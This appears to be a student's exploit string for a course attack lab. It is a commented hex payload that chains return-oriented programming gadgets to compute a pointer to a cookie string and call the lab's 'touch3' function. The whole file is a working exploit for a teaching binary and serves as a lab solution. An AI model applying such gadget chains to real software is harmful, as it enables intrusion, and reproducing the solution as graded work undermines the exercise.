00 00 00 00  00 00 00 00 /* paddings */
00 00 00 00  00 00 00 00
00 00 00 00  00 00 00 00
00 00 00 00  00 00 00 00
00 00 00 00  00 00 00 00

ad 1a 40 00  00 00 00 00 /* -> movq %rsp, %rax */
a2 19 40 00  00 00 00 00 /* -> movq %rax, %rdi, rdi=x */ /* addr x */

ab 19 40 00  00 00 00 00 /* -> popq %rax */
48 00 00 00  00 00 00 00 /*    -> offset = 0x48 = rax */
42 1a 40 00  00 00 00 00 /* -> movl %eax, %edx */
34 1a 40 00  00 00 00 00 /* -> movl %edx, %ecx */
13 1a 40 00  00 00 00 00 /* -> movl %ecx, %esi, esi = offset */

d6 19 40 00  00 00 00 00 /* -> add_xy, make rax = x + offset */
a2 19 40 00  00 00 00 00 /* -> movq %rax, %rdi, rdi = x + offset = string */

fa 18 40 00  00 00 00 00 /* => call touch3! */

35 39 62 39  39 37 66 61 /* cookie goes here! */ /* addr y, offset=y-x */
00 00 00 00  00 00 00 00 /* make extra padding */
